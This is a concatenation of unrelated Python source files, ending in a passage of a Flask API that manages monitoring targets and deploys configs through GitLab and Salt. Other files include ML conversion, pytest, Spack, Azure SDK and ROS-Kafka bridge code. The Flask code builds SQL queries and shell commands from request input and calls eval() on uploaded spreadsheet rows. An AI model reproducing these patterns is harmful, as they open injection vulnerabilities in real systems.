license = 'MIT',
classifiers = [
'Development Status :: 3 - Alpha',
'Environment :: Console',
'Intended Audience :: Developers',
'License :: Copyheart',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Topic :: Software Development :: Libraries :: Python Modules'
],
)
|
py | 1a4bb48b9c95bb676b9726795084b0a452f12e16 | import numpy as np
from sklearn import datasets
from lightgbm.sklearn import LGBMRegressor
from hummingbird.ml import convert
import onnxruntime
import torch
x, y = datasets.load_wine(return_X_y=True)
x = x.astype(np.float32)
model = LGBMRegressor(n_estimators=10)
model.fit(x, y)
preds = model.predict(x)
pytorch_model = convert(model, "pytorch")
torch.onnx.export(
pytorch_model.model,
(torch.from_numpy(x)),
"model.onnx",
input_names=["input"],
output_names=["output"],
dynamic_axes={"input": {0: "batch"}, "output": {0: "batch"}},
)
np.savez_compressed(
open("io.npz", "wb"), input=x[:1], output=preds[:1],
)
# sanity check - onnxruntime inference
sess = onnxruntime.InferenceSession("model.onnx")
outputs = sess.run(None, {"input": x[:1]})[0][:, 0]
assert np.allclose(outputs, preds[:1])
|
py | 1a4bb4c572765c2dec88c8dbb9299ce134f4801b | # Copyright 2022 Google LLC.
#
# Licensed under the Apache License, Version 2.0 (the 'License');
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an 'AS IS' BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import subprocess
import pytest
import main
def test_main(capsys):
main.main()
out, _ = capsys.readouterr()
expected = "Completed Task #0."
assert expected in out
def test_env_vars():
with pytest.raises(Exception, match=r".*failed.*"):
main.main(fail_rate="0.999999")
def test_bad_env_vars(capsys):
main.main(fail_rate="2") # Does not fail, so retry is not triggered
out, _ = capsys.readouterr()
assert "Invalid FAIL_RATE env var value" in out
def test_run_script():
output = (
subprocess.run(
["python3", "main.py"],
stdout=subprocess.PIPE,
check=True,
)
.stdout.strip()
.decode()
)
assert "Completed" in output
my_env = {"FAIL_RATE": "0.99999999"}
with pytest.raises(subprocess.CalledProcessError, match=r".*non-zero.*"):
subprocess.run(
["python3", "main.py"],
env=my_env,
stderr=subprocess.PIPE,
check=True,
)
|
py | 1a4bb582dc329d2cb2ff060a8acc7ad67c5a7621 | # Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class GitTest(Package):
"""Mock package that uses git for fetching."""
homepage = "http://www.git-fetch-example.com"
version('git', branch='master', git='to-be-filled-in-by-test')
def install(self, spec, prefix):
pass
|
py | 1a4bb634cfcdb033cf8038a3525aee6d107280e4 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is regenerated.
# --------------------------------------------------------------------------
from typing import TYPE_CHECKING
import warnings
from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error
from azure.core.paging import ItemPaged
from azure.core.pipeline import PipelineResponse
from azure.core.pipeline.transport import HttpRequest, HttpResponse
from azure.mgmt.core.exceptions import ARMErrorFormat
from .. import models as _models
if TYPE_CHECKING:
# pylint: disable=unused-import,ungrouped-imports
from typing import Any, Callable, Dict, Generic, Iterable, Optional, TypeVar
T = TypeVar('T')
ClsType = Optional[Callable[[PipelineResponse[HttpRequest, HttpResponse], T, Dict[str, Any]], Any]]
class LoadBalancerFrontendIPConfigurationsOperations(object):
"""LoadBalancerFrontendIPConfigurationsOperations operations.
You should not instantiate this class directly. Instead, you should create a Client instance that
instantiates it for you and attaches it as an attribute.
:ivar models: Alias to model classes used in this operation group.
:type models: ~azure.mgmt.network.v2020_07_01.models
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
"""
models = _models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self._config = config
def list(
self,
resource_group_name, # type: str
load_balancer_name, # type: str
**kwargs # type: Any
):
# type: (...) -> Iterable["_models.LoadBalancerFrontendIPConfigurationListResult"]
"""Gets all the load balancer frontend IP configurations.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: An iterator like instance of either LoadBalancerFrontendIPConfigurationListResult or the result of cls(response)
:rtype: ~azure.core.paging.ItemPaged[~azure.mgmt.network.v2020_07_01.models.LoadBalancerFrontendIPConfigurationListResult]
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.LoadBalancerFrontendIPConfigurationListResult"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
accept = "application/json"
def prepare_request(next_link=None):
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
if not next_link:
# Construct URL
url = self.list.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
request = self._client.get(url, query_parameters, header_parameters)
else:
url = next_link
query_parameters = {} # type: Dict[str, Any]
request = self._client.get(url, query_parameters, header_parameters)
return request
def extract_data(pipeline_response):
deserialized = self._deserialize('LoadBalancerFrontendIPConfigurationListResult', pipeline_response)
list_of_elem = deserialized.value
if cls:
list_of_elem = cls(list_of_elem)
return deserialized.next_link or None, iter(list_of_elem)
def get_next(next_link=None):
request = prepare_request(next_link)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
return pipeline_response
return ItemPaged(
get_next, extract_data
)
list.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations'} # type: ignore
def get(
self,
resource_group_name, # type: str
load_balancer_name, # type: str
frontend_ip_configuration_name, # type: str
**kwargs # type: Any
):
# type: (...) -> "_models.FrontendIPConfiguration"
"""Gets load balancer frontend IP configuration.
:param resource_group_name: The name of the resource group.
:type resource_group_name: str
:param load_balancer_name: The name of the load balancer.
:type load_balancer_name: str
:param frontend_ip_configuration_name: The name of the frontend IP configuration.
:type frontend_ip_configuration_name: str
:keyword callable cls: A custom type or function that will be passed the direct response
:return: FrontendIPConfiguration, or the result of cls(response)
:rtype: ~azure.mgmt.network.v2020_07_01.models.FrontendIPConfiguration
:raises: ~azure.core.exceptions.HttpResponseError
"""
cls = kwargs.pop('cls', None) # type: ClsType["_models.FrontendIPConfiguration"]
error_map = {
401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError
}
error_map.update(kwargs.pop('error_map', {}))
api_version = "2020-07-01"
accept = "application/json"
# Construct URL
url = self.get.metadata['url'] # type: ignore
path_format_arguments = {
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str'),
'loadBalancerName': self._serialize.url("load_balancer_name", load_balancer_name, 'str'),
'frontendIPConfigurationName': self._serialize.url("frontend_ip_configuration_name", frontend_ip_configuration_name, 'str'),
'subscriptionId': self._serialize.url("self._config.subscription_id", self._config.subscription_id, 'str'),
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {} # type: Dict[str, Any]
query_parameters['api-version'] = self._serialize.query("api_version", api_version, 'str')
# Construct headers
header_parameters = {} # type: Dict[str, Any]
header_parameters['Accept'] = self._serialize.header("accept", accept, 'str')
request = self._client.get(url, query_parameters, header_parameters)
pipeline_response = self._client._pipeline.run(request, stream=False, **kwargs)
response = pipeline_response.http_response
if response.status_code not in [200]:
map_error(status_code=response.status_code, response=response, error_map=error_map)
raise HttpResponseError(response=response, error_format=ARMErrorFormat)
deserialized = self._deserialize('FrontendIPConfiguration', pipeline_response)
if cls:
return cls(pipeline_response, deserialized, {})
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Network/loadBalancers/{loadBalancerName}/frontendIPConfigurations/{frontendIPConfigurationName}'} # type: ignore
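# A minimal usage sketch (hedged: resource names are placeholders and the
# standard azure-mgmt-network / azure-identity client wiring is assumed):
#
#   from azure.identity import DefaultAzureCredential
#   from azure.mgmt.network import NetworkManagementClient
#
#   client = NetworkManagementClient(DefaultAzureCredential(), "<subscription-id>")
#   for frontend in client.load_balancer_frontend_ip_configurations.list(
#           "my-resource-group", "my-load-balancer"):
#       print(frontend.name)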
|
py | 1a4bb7512bd4eba4776444348e89436ab1e85ac6 | #!/usr/bin/env python
import rospy
from rospy_message_converter import message_converter
from rospy_message_converter import json_message_converter
import rosbridge_library.internal.ros_loader as ros_loader
from kafka import KafkaProducer
from kafka import KafkaConsumer
from TokenProvider import TokenProvider
from json import dumps
from json import loads
from confluent.schemaregistry.client import CachedSchemaRegistryClient
from confluent.schemaregistry.serializers import MessageSerializer
import avro.schema  # required for avro.schema.parse() when loading a schema from a local file
class Topic:
def __init__(self, kafka_topic, ros_topic, ros_msg_type, avro_subject=None, avro_file=""):
self.kafka_topic = kafka_topic
self.ros_topic = ros_topic
self.ros_msg_type = ros_msg_type
self.avro_subject = avro_subject
self.avro_file = avro_file
def kafka_or_avro_log(self):
return ("AVRO", "KAFKA")[self.avro_subject!=None]
class KafkaTopicToROS:
def __init__(self, kafka_topic, ros_topic_list=[], avro_subject=None):
self.kafka_topic = kafka_topic
self.ros_topics = ros_topic_list
self.avro_subject = avro_subject
class ROSTopic:
def __init__(self, ros_topic_name, ros_topic_msg_type, ros_publisher =None):
self.ros_topic_name = ros_topic_name
self.ros_topic_msg_type = ros_topic_msg_type
self.ros_publisher = ros_publisher
class comm_bridge():
def __init__(self):
# initialize node
rospy.init_node("comm_bridge")
rospy.on_shutdown(self.shutdown)
# Retrieve parameters from launch file
# Global Kafka parameters
local_server = rospy.get_param("~local_server", False)
bootstrap_server = rospy.get_param("~bootstrap_server", "localhost:9092")
schema_server = rospy.get_param("~schema_server", "http://localhost:8081/")
self.use_ssl = rospy.get_param("~use_ssl", False)
self.use_avro = rospy.get_param("~use_avro", False)
self.nan_as_str = rospy.get_param("~nan_as_str", False)
self.oauth_token = rospy.get_param("~oauth_token", False)
self.use_strict_mode = rospy.get_param("~use_strict_mode", True)
self.group_id = rospy.get_param("~group_id", None)
if (self.group_id == "no-group"):
self.group_id = None
if (self.use_ssl):
self.ssl_cafile = rospy.get_param("~ssl_cafile", '../include/certificate.pem')
self.ssl_keyfile = rospy.get_param("~ssl_keyfile", "../include/kafka.client.keystore.jks")
self.ssl_password = rospy.get_param("~ssl_password", "password")
self.ssl_security_protocol = rospy.get_param("~ssl_security_protocol", "SASL_SSL")
self.ssl_sasl_mechanism = rospy.get_param("~ssl_sasl_mechanism", "PLAIN")
self.sasl_plain_username = rospy.get_param("~sasl_plain_username", "username")
self.sasl_plain_password = rospy.get_param("~sasl_plain_password", "password")
if (self.oauth_token):
self.ssl_security_protocol = rospy.get_param("~ssl_security_protocol", "SASL_PLAINTEXT")
self.ssl_sasl_mechanism = rospy.get_param("~ssl_sasl_mechanism", "OAUTHBEARER")
self.sasl_oauth_client_id = rospy.get_param("~sasl_oauth_client_id", "client_id")
self.sasl_oauth_client_secret = rospy.get_param("~sasl_oauth_client_secret", "client_secret")
self.oauth_token_url = rospy.get_param("~oauth_token_url", "")
# from Kafka to ROS topics parameters
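# Illustrative sketch (an assumption, inferred from the keys read below) of the
# ~list_from_kafka parameter; the exact YAML/launch-file syntax of the real config may differ:
#   list_from_kafka:
#     - kafka_topic: "kafka_in"              # new format: several ROS topics per Kafka topic
#       ros_topic_list:
#         - {ros_topic_name: "imu", ros_topic_msg_type: "sensor_msgs/Imu"}
#     - kafka_topic: "kafka_cmd"             # old format: a single ROS topic
#       ros_topic_name: "cmd_vel"
#       ros_topic_msg_type: "geometry_msgs/Twist"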
list_from_kafka_topics = rospy.get_param("~list_from_kafka", [])
self.list_from_kafka = []
for kafka_item in list_from_kafka_topics:
self.topic_list = []
# list topic new format at yaml file
if "ros_topic_list" in kafka_item:
for ros_item in kafka_item["ros_topic_list"]:
# TODO: check if some value is missing
ros_t_name = "from_kafka/"+ros_item["ros_topic_name"]
ros_t_msg = ros_item["ros_topic_msg_type"]
msg_func = ros_loader.get_message_class(ros_t_msg)
ros_pub = rospy.Publisher(ros_t_name, msg_func, queue_size=10)
self.topic_list.append(ROSTopic(ros_t_name,ros_t_msg, ros_pub))
## TODO: check if some value is missing
#only one ROS topic at yaml file (old format)
else:
ros_t_name = "from_kafka/"+kafka_item["ros_topic_name"]
ros_t_msg = kafka_item["ros_topic_msg_type"]
msg_func = ros_loader.get_message_class(ros_t_msg)
ros_pub = rospy.Publisher(ros_t_name, msg_func, queue_size=10)
self.topic_list.append(ROSTopic(ros_t_name,ros_t_msg, ros_pub))
self.list_from_kafka.append(KafkaTopicToROS(kafka_item["kafka_topic"], self.topic_list))
# from ROS to Kafka topics parameters
list_to_kafka_topics = rospy.get_param("~list_to_kafka", [])
self.list_to_kafka = []
for item in list_to_kafka_topics:
# TODO: check if some value is missing
if self.use_avro:
if "avro_file" in item.keys():
self.list_to_kafka.append(Topic(item["kafka_topic"], "to_kafka/"+item["ros_topic_name"],
item["ros_topic_msg_type"], item["avro_subject"], item["avro_file"]))
else:
self.list_to_kafka.append(Topic(item["kafka_topic"], "to_kafka/"+item["ros_topic_name"],
item["ros_topic_msg_type"], item["avro_subject"]))
else:
self.list_to_kafka.append(Topic(item["kafka_topic"], "to_kafka/"+item["ros_topic_name"],
item["ros_topic_msg_type"]))
# Create schema registry connection and serializer
if self.use_avro:
self.client = CachedSchemaRegistryClient(url=schema_server)
self.serializer = MessageSerializer(self.client)
if (self.use_avro):
for topic in self.list_to_kafka:
rospy.loginfo("Loading schema for " + topic.avro_subject + " from registry server")
_, topic.avro_schema, _ = self.client.get_latest_schema(topic.avro_subject)
if topic.avro_file != "":
rospy.loginfo("Loading schema for " + topic.avro_subject + " from file " + topic.avro_file + " as it does not exist in the server")
topic.avro_schema = avro.schema.parse(open(topic.avro_file).read())
if topic.avro_schema is None:
rospy.logerr("cannot get schema for " + topic.avro_subject)
# Create kafka consumer
# TODO: check possibility of using serializer directly (param value_deserializer from KafkaConsumer)
for kafka_topic in self.list_from_kafka:
if(self.use_ssl):
kafka_topic.consumer = KafkaConsumer(kafka_topic.kafka_topic,
bootstrap_servers=bootstrap_server,
security_protocol=self.ssl_security_protocol,
ssl_check_hostname=False,
ssl_cafile=self.ssl_cafile,
ssl_keyfile=self.ssl_keyfile,
sasl_mechanism=self.ssl_sasl_mechanism,
ssl_password=self.ssl_password,
sasl_plain_username=self.sasl_plain_username,
sasl_plain_password=self.sasl_plain_password
)
elif(self.oauth_token):
kafka_topic.consumer = KafkaConsumer(kafka_topic.kafka_topic,
bootstrap_servers=bootstrap_server,
enable_auto_commit=True,
security_protocol="SASL_PLAINTEXT",
sasl_mechanism="OAUTHBEARER",
value_deserializer=lambda x: loads(x.decode('utf-8')),
sasl_oauth_token_provider=TokenProvider(tokenURL=self.oauth_token_url,
client_id=self.sasl_oauth_client_id,
client_secret=self.sasl_oauth_client_secret)
)
else:
kafka_topic.consumer = KafkaConsumer(kafka_topic.kafka_topic,
bootstrap_servers=bootstrap_server,
auto_offset_reset='latest',
consumer_timeout_ms=5000,
group_id=self.group_id
)
# Import msg type
#msg_func = ros_loader.get_message_class(kafka_topic.ros_msg_type)
# Subscribe to ROS topic of interest
#topic.publisher = rospy.Publisher(topic.ros_topic, msg_func, queue_size=10)
#rospy.logwarn("Using {} MSGs from KAFKA: {} -> ROS: {}".format(topic.ros_msg_type, topic.kafka_topic, topic.ros_topic))
# Create kafka producer
# TODO: check possibility of using serializer directly (param value_serializer from KafkaProducer)
for topic in self.list_to_kafka:
if(self.use_ssl):
topic.producer = KafkaProducer(bootstrap_servers=bootstrap_server,
security_protocol=self.ssl_security_protocol,
ssl_check_hostname=False,
ssl_cafile=self.ssl_cafile,
ssl_keyfile=self.ssl_keyfile,
sasl_mechanism=self.ssl_sasl_mechanism,
ssl_password=self.ssl_password,
sasl_plain_username=self.sasl_plain_username,
sasl_plain_password=self.sasl_plain_password
)
elif(self.oauth_token):
topic.producer = KafkaProducer(bootstrap_servers=bootstrap_server,
value_serializer=lambda x: dumps(x).encode('utf-8'),
security_protocol="SASL_PLAINTEXT",
sasl_mechanism="OAUTHBEARER",
sasl_oauth_token_provider=TokenProvider(tokenURL=self.oauth_token_url,
client_id=self.sasl_oauth_client_id,
client_secret=self.sasl_oauth_client_secret)
)
else:
topic.producer = KafkaProducer(bootstrap_servers=bootstrap_server)
# ROS does not allow a change in msg type once a topic is created. Therefore the msg
# type must be imported and specified ahead of time.
msg_func = ros_loader.get_message_class(topic.ros_msg_type)
# Subscribe to the topic with the chosen imported message type
rospy.Subscriber(topic.ros_topic, msg_func, self.callback, topic)
rospy.logwarn("Using {} MSGs from ROS: {} -> KAFKA: {}".format(topic.ros_msg_type, topic.ros_topic, topic.kafka_topic))
def callback(self, msg, topic):
# Convert from ROS Msg to Dictionary
msg_as_dict = message_converter.convert_ros_message_to_dictionary(msg)
# also print as json for debugging purposes
msg_as_json = json_message_converter.convert_ros_message_to_json(msg)
if self.nan_as_str:
msg_as_json = msg_as_json.replace("NaN", '"NaN"')
# Output msg to ROS and send to Kafka server
rospy.loginfo("Sending from ROS topic {} to Kafka topic {}: {}".format(topic.ros_topic, topic.kafka_topic, msg_as_json))
# Convert from Dictionary to Kafka message
# this way is slow, as it has to retrieve last schema
# msg_as_serial = self.serializer.encode_record_for_topic(self.kafka_topic, msg_as_dict)
if (self.use_avro):
try:
msg_as_serial = self.serializer.encode_record_with_schema(topic.kafka_topic, topic.avro_schema, msg_as_dict)
topic.producer.send(topic.kafka_topic, value=msg_as_serial)
except Exception as e:
if topic.kafka_topic is None:
rospy.logwarn("kafka_topic is None")
elif topic.avro_schema is None:
rospy.logwarn("Tryed connect with the topic: " + topic.kafka_topic + ", but the avro_schema is None. Was the schema registry?")
else:
rospy.logwarn("Cannot publish to " + topic.kafka_topic + " with schema " + topic.avro_schema.name + ". Probably bad schema name on registry")
else:
try:
topic.producer.send(topic.kafka_topic, value=msg_as_json)
except Exception as e:
if topic.kafka_topic is None:
rospy.logwarn("kafka_topic is None")
else:
rospy.logwarn("Cannot publish to " + topic.kafka_topic + ". Probably bad topic name on registry")
def run(self):
while not rospy.is_shutdown():
for kafka_topic in self.list_from_kafka:
for kafka_msg in kafka_topic.consumer:
for ros_topic in kafka_topic.ros_topics:
if (self.use_avro):
try:
# Convert Kafka message to Dictionary
msg_as_dict = self.serializer.decode_message(kafka_msg.value)
# Convert Dictionary to ROS Msg
ros_msg = message_converter.convert_dictionary_to_ros_message(ros_topic.ros_topic_msg_type, msg_as_dict, self.use_strict_mode)
# Publish only to the first ROS topic successfully parsed
ros_topic.ros_publisher.publish(ros_msg)
break
except ValueError as e:
rospy.logwarn(str(e) + ': time to debug!')
else:
try:
msg_func = ros_loader.get_message_class(ros_topic.ros_topic_msg_type)
ros_msg = json_message_converter.convert_json_to_ros_message(ros_topic.ros_topic_msg_type, kafka_msg.value, self.use_strict_mode)
rospy.loginfo(" Kafka topic {} to ROS topic {}: {}".format(kafka_topic.kafka_topic, ros_topic.ros_topic_name, kafka_msg.value))
# Publish only to the first ROS topic successfully parsed
ros_topic.ros_publisher.publish(ros_msg)
#publish
rospy.loginfo("Sending from Kafka topic {} to ROS topic {}: {}".format(kafka_topic.kafka_topic, ros_topic.ros_topic_name, msg_func))
break
except ValueError as ve:
rospy.logwarn("Cannot parser kafka msg {} to ROS topic {}: {}. Exception: {}".format(kafka_topic.kafka_topic, ros_topic.ros_topic_name, msg_func, str(ve)))
def shutdown(self):
rospy.loginfo("Shutting down")
if __name__ == "__main__":
try:
node = comm_bridge()
node.run()
except rospy.ROSInterruptException:
pass
rospy.loginfo("Exiting")
|
py | 1a4bb77c4da937cecd23e049c057d74b5661bc04 | # Generated by Django 2.2 on 2019-05-21 20:10
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('cse', '0030_doctors_gender'),
]
operations = [
migrations.AddField(
model_name='doctors',
name='tel_no',
field=models.CharField(default=None, max_length=20),
),
]
|
py | 1a4bb896241557ee90a7f50e26868c019de65d85 | # -*- coding:utf-8 -*-
import os
from concurrent.futures.thread import ThreadPoolExecutor
from flask_restful import Resource, reqparse, request
from flask import g, app
from common.log import loggers
from common.audit_log import audit_log
from common.db import DB
from common.utility import uuid_prefix, salt_api_for_product
from common.sso import access_required
import json
from common.xlsx import Xlsx
from fileserver.git_fs import gitlab_project, gitlab_project_name
from system.user import update_user_privilege, update_user_product
from common.const import role_dict
from fileserver.rsync_fs import rsync_config
logger = loggers()
parser = reqparse.RequestParser()
parser.add_argument("host_id", type=str, required=True, trim=True)
parser.add_argument("target_id", type=str, default='', trim=True)
parser.add_argument("target", type=str, default='', trim=True)
parser.add_argument("IP", type=str, default='', trim=True)
parser.add_argument("location", type=str, default='', trim=True)
parser.add_argument("model", type=str, default='', trim=True)
parser.add_argument("type", type=str, default='', trim=True)
parser.add_argument("project", type=str, default='', trim=True)
parser.add_argument("client", type=str, default='', trim=True)
parser.add_argument("pool", type=str, default='', trim=True)
parser.add_argument("path", type=str, default='', trim=True)
parser.add_argument("key_word", type=str, default='', trim=True)
parser.add_argument("file_name", type=str, default='', trim=True)
parser.add_argument("cipher", type=str, default='', trim=True)
class Target(Resource):
@access_required(role_dict["common_user"])
def get(self, target_id):
db = DB()
status, result = db.select_by_id("target", target_id)
db.close_mysql()
if status is True:
if result:
return {"data": result, "status": True, "message": ""}, 200
else:
return {"status": False, "message": "%s does not exist" % target_id}, 404
else:
return {"status": False, "message": result}, 500
@access_required(role_dict["product"])
def delete(self, target_id):
db = DB()
status, result = db.delete_by_id("target", target_id)
db.close_mysql()
logger.info('delete:' + str(result))
if status is not True:
logger.error("Delete product error: %s" % result)
return {"status": False, "message": result}, 500
if result == 0:
return {"status": False, "message": "%s does not exist" % target_id}, 404
return {"status": True, "message": ""}, 200
@access_required(role_dict["product"])
def put(self, target_id):
args = parser.parse_args()
logger.info(args['host_id'])
args["id"] = target_id
logger.info('id:' + target_id)
del args['path'], args['key_word'], args['file_name'], args['target_id'], args['cipher']
target = args
db = DB()
status, result = db.select_by_id('target', target_id)
origion_IP = result['IP']
host_id = result['host_id']
args['host_id'] = host_id
if origion_IP != args['IP']:
status, message = judge_target_IP_exist(args['IP'], args['host_id'])
if status is not True:
return {"status": False, "message": message}, 500
status, result = db.update_by_id("target", json.dumps(target, ensure_ascii=False), target_id)
db.close_mysql()
if status is not True:
logger.error("Modify target: %s" % result)
return {"status": False, "message": result}, 500
return {"status": True, "message": result}, 200
class TargetList(Resource):
@access_required(role_dict["common_user"])
def get(self):
logger.info("TargetLIST")
host_id = request.args.get("host_id")
db = DB()
status, result = db.select("target", "where data -> '$.host_id'='%s'" % host_id)
if status is True:
target_list = result
else:
db.close_mysql()
return {"status": False, "message": result}, 500
db.close_mysql()
return {"data": target_list, "status": True, "message": ""}, 200
@access_required(role_dict["product"])
def post(self):
args = parser.parse_args()
args["id"] = uuid_prefix("t")
del args['path'], args['key_word'], args['file_name'], args['target_id'], args['cipher']
target = args
db = DB()
status, message = judge_target_IP_exist(args['IP'], args['host_id'])
if status is True:
insert_status, insert_result = db.insert("target", json.dumps(target, ensure_ascii=False))
if insert_status is not True:
db.close_mysql()
return {"status": False, "message": str(insert_result)}, 500
else:
db.close_mysql()
return {"status": False, "message": message}, 500
db.close_mysql()
return {"status": True, "message": message}, 200
def judge_target_IP_exist(IP, host_id):
db = DB()
status, result = db.select("target", "where data -> '$.IP'='%s' AND data -> '$.host_id'='%s'" % (
IP, host_id))
if status is not True:
return False, 'select error'
else:
if len(result) == 0:
return True, ''
else:
return False, 'IP already exists'
# Upload file (bulk-import targets from an uploaded xlsx spreadsheet)
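# Illustrative (assumed) output of Xlsx.export_db(): a ';'-separated string of dict
# literals, one per spreadsheet row, e.g.
#   "{'target': 'sw-01', 'IP': '10.0.0.1', 'model': 'XYZ'};{'target': 'sw-02', ...};"
# Each dict literal is eval()'d below and completed with 'host_id' and a generated 'id'.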
class UploadTarget(Resource):
@access_required(role_dict["common_user"])
def post(self):
logger.info("UploadTarget")
args = parser.parse_args()
host_id = args['host_id']
file = request.files['file']
file.save(os.path.join('/tmp', file.filename))
db = DB()
try:
xlsx_file = Xlsx(os.path.join('/tmp', file.filename))
xlsx_file.read()
config_db_result = xlsx_file.export_db()
targets = config_db_result.split(';')
status, set_repeat = self.get_repeat_target(targets)
if not status:
logger.info('存在重复IP')
return {"status": True, "message": "存在重复IP!为:" + str(set_repeat)}, 200
exist_ip_list = []
for i in range(0, len(targets) - 1):
target_dic = eval(targets[i])
target_dic['host_id'] = host_id
target_dic['id'] = uuid_prefix('t')
logger.info(str(target_dic))
status, message = judge_target_IP_exist(target_dic['IP'], host_id)
if status:
insert_status, insert_result = db.insert("target", json.dumps(target_dic, ensure_ascii=False))
if insert_status is not True:
logger.error("error:" + insert_result)
return {"status": False, "message": str(insert_result)}, 200
else:
exist_ip_list.append(target_dic['IP'])
if len(exist_ip_list) == 0:
return {"status": True, "message": ""}, 200
else:
return {"status": False, "message": "表格中有已经存在的IP:" + str(exist_ip_list) + ',其余IP已经添加完成'}, 200
except Exception as e:
logger.info('error:' + str(e))
return {"status": False, "message": str(e)}, 200
finally:
logger.info("close db")
db.close_mysql()
def get_repeat_target(self, target_list):
set_base = set()
set_repeat = set()
for i in range(0, len(target_list) - 1):
target_dic = eval(target_list[i])
key = target_dic['IP']
if set_base.__contains__(key):
set_repeat.add(key)
else:
set_base.add(key)
if set_repeat:
return False, set_repeat
else:
return True, set_repeat
class ConfigGenerate(Resource):
@access_required(role_dict["common_user"])
def post(self):
logger.info("ConfigGenerate")
db = DB()
# First, fetch all required configuration parameters and preprocess them
args = parser.parse_args()
host_id = args['host_id']
key_word = args['key_word']
path = args['path']
file_name = args['file_name']
path_str = str(path)
if path_str:
if path_str.endswith('/'):
path_str = path_str
else:
path_str = path_str + '/'
else:
path_str = '/usr/local/prometheus/conf.d/'
if file_name:
file_name = file_name
else:
file_name = 'snmpconf_' + key_word + '.json'
state, result = db.select('host', "where data -> '$.id'='%s'" % host_id)
if state is False:
return {"status": False, "message": '主机信息未知'}, 500
host = dict(result[0])
product_id = host['product_id']
minion_id = host['minion_id']
state, product_result = db.select('product', "where data -> '$.id'='%s'" % product_id)
if state is False:
return {"status": False, "message": 'product未知'}, 500
product_host = product_result[0]
master_id = product_host['salt_master_id']
salt_api = salt_api_for_product(product_id)
# Generate the config file for the targets whose model matches the keyword
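# Illustrative (assumed) shape of the generated content: a list of Prometheus
# file_sd-style entries, one per target whose 'model' field contains the keyword, e.g.
# [
#   {'targets': ['sw-01'], 'labels': {'IP': '10.0.0.1', 'location': 'DC1', 'model': 'XYZ', ...}},
# ]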
status, result = db.select("target", "where data -> '$.host_id'='%s'" % host_id)
if status is True:
target_list = result
else:
db.close_mysql()
return {"status": False, "message": result}, 500
try:
strresult = '[\n'
for target in target_list:
model = str(target['model'])
if model.__contains__(key_word):
target_str = target.pop('target')
del target['host_id'], target['id']
resdic = {"targets": [target_str], "labels": target}
strresult += " " + str(resdic) + ',\n'
strresult = strresult[:-1] + '\n]'
except Exception as e:
return {"status": False, "message": '监控目标信息解析出错'}, 500
# Upload the file to GitLab
project_name_list = list(get_host_project(host))
logger.info('project_name_list' + str(project_name_list))
if len(project_name_list) == 0:
return {"status": False, "message": '该主机无归属项目'}, 200
elif len(project_name_list) > 1:
return {"status": False, "message": '该主机所属项目不唯一!' + str(project_name_list)}, 200
state, result = db.select('projects', "where data -> '$.name'='%s'" % project_name_list[0])
project_gitlab_name = result[0]['gitlab_name']
logger.info("project_gitlab_name:" + project_gitlab_name)
project, _ = gitlab_project_name(product_id, project_gitlab_name)
# Assemble the command
source = '/tmp/' + project_gitlab_name + '/' + minion_id + '/' + file_name
source_tmp = '/tmp/' + project_gitlab_name + '/' + minion_id + '/tmp_file'
dest = path_str + file_name
command = 'salt-cp ' + minion_id + ' ' + source_tmp + ' ' + dest
# Supported actions: create, delete, move, update
branch_name = "master"
data_create = {
'branch': branch_name,
'commit_message': command,
'actions': [
{
'action': "create",
'file_path': minion_id + '/' + file_name,
'content': strresult
}
]
}
data_update = {
'branch': branch_name,
'commit_message': command,
'actions': [
{
'action': "update",
'file_path': minion_id + '/' + file_name,
'content': strresult
}
]
}
if isinstance(project, dict):
return project, 500
else:
try:
project.commits.create(data_create)
except Exception as e:
# logger.info('update'+str(e))
project.commits.create(data_update)
# Verify permissions, then execute the delivery
command_path = 'mkdir -p ' + path_str
logger.info('minion_id:' + minion_id)
salt_api.shell_remote_execution(minion_id, command_path)
# Because the file name may contain Chinese characters, an intermediate temp file is used for the transfer
command_list = []
